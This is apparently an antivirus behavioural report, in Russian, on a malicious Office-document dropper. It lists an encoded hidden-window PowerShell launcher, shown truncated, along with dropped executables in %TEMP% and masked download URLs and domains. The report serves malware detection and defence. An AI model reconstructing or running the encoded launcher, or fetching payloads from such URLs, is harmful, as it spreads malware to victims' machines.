Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGkAdABlAGIANgA4AD0AKAAnAFgAOQAnACsAKAAnAHYAdwB5AGwAJwArACcAMgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdABFAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\895757.cvr
- %TEMP%\word\2019\qp4_r4.exe
Удаляет следующие файлы
- %TEMP%\word\2019\qp4_r4.exe
Подменяет следующие файлы
- %TEMP%\word\2019\qp4_r4.exe
Сетевая активность
Подключается к
- 'te##lh.com':80
- 'hz##chi.com':80
- 'in####bericos.com':80
- 'ma###ineltd.com':80
- 'ma###ineltd.com':443
- 'di###adayal.com':80
- 't-###inity.com':80
- 'hh##ao.com':443
TCP
Запросы HTTP GET
- http://te##lh.com/list/f/
- http://hz##chi.com/css/ia8/
- http://www.in####bericos.com/data/FMh/
- http://www.ma###ineltd.com/vfjg4wg4/Fz/
- http://di###adayal.com/cgi-bin/c3h/
- http://di###adayal.com/cgi-bin/c3h/1
- http://t-###inity.com/sites/x/
Другие
- 'ma###ineltd.com':443
UDP
- DNS ASK te##lh.com
- DNS ASK hz##chi.com
- DNS ASK in####bericos.com
- DNS ASK ma###ineltd.com
- DNS ASK di###adayal.com
- DNS ASK t-###inity.com
- DNS ASK hh##ao.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAGkAdABlAGIANgA4AD0AKAAnAFgAOQAnACsAKAAnAHYAdwB5AGwAJwArACcAMgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdABFAG0AcABcAHcAbwBSAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)
